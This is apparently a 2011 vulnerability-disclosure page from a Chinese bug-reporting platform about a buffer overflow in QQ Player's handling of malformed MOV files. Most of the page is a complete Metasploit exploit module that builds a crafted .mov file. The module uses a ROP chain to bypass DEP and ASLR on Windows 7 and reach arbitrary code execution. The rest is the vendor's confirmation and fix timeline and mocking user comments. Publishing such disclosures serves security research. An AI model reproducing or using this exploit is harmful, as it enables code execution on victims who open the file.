2011-11-21: 细节已通知厂商并且等待厂商处理中 2011-11-21: 厂商已经确认,细节仅向厂商公开 2011-11-24: 细节向第三方安全合作伙伴开放 2012-01-15: 细节向核心白帽子及相关领域专家公开 2012-01-25: 细节向普通白帽子公开 2012-02-04: 细节向实习白帽子公开 2011-12-21: 细节向公众公开
qq播放器核心版本过低,在处理畸形MOV文件时,缓冲区溢出,可覆盖SEH任意代码执行不愧为山寨之王http://115.com/file/cl3naedvhttp://115.com/file/aqu3qzmk
# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS# Date: 2011,11,21# Author: hellok# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe# Version: 32_845(lastest)# Tested on: WIN7require 'msf/core'class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS', 'Description' => %q{ This module exploits a vulnerability in QQPLAYER Player 3.2. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'hellok', #special thank corelanc0d3r for 'mona' ], 'References' => [ ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 750, 'BadChars' => "", #Memcpy 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'DisableNops' => 'True', 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", 'EncoderOptions' => { 'BufferRegister' => 'ECX', }, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7', { 'Ret' => 0x67664cde } ], ], 'Privileged' => false, 'DisclosureDate' => '11 21 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]), ], self.class) end def exploit # !mona rop rop_gadgets = [ 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x12345678, 0x67664CE4, 0x01020304, 0x10203040, 0x22331122, 0x23456789, 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x00a9c18c, # <- *&VirtualProtect() 0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe) #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe) 0x008cf099, # XCHG EAX,ESI # RETN 0x6497aaad, # POP EBP # RETN (avformat-52.dll) 0x100272bf, # ptr to 'call esp' (from i18nu.dll) 0x005fc00b, # POP EBX # RETN (QQPlayer.exe) 0x00000331, # <- change size to mark as executable if needed (-> ebx) 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x63d18000, # RW pointer (lpOldProtect) (-> ecx) 0x63d05001, # POP EDI # RETN (avutil-49.dll) 0x63d05002, # ROP NOP (-> edi) 0x008bf00b, # POP EDX # RETN (QQPlayer.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00468800, # POP EAX # RETN (QQPlayer.exe) 0x90909090, # NOPS (-> eax) 0x008bad5c, # PUSHAD # RETN (QQPlayer.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") stackpivot = [target.ret].pack('L') buffer =rand_text_alpha_upper(90)#2 buffer << rop_gadgets buffer << payload.encoded junk = rand_text_alpha_upper(2306 - buffer.length) buffer << junk buffer << stackpivot buffer << rand_text_alpha_upper(3000)#3000 path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" ) fd = File.open(path, "rb" ) sploit = fd.read(fd.stat.size) fd.close sploit << buffer file_create(sploit) endend
无
危害等级:高
漏洞Rank:20
确认时间:2011-11-21 18:10
非常感谢你的报告,我们正在跟进。
2011-11-22:跟进中
2011-11-24:已修复
我勒个去!
我勒个擦
本来@腾讯 就是山寨之王
要不要那么搞笑的
太有喜感了,这吐槽
不愧为山寨之王。。哈哈哈
牛逼强货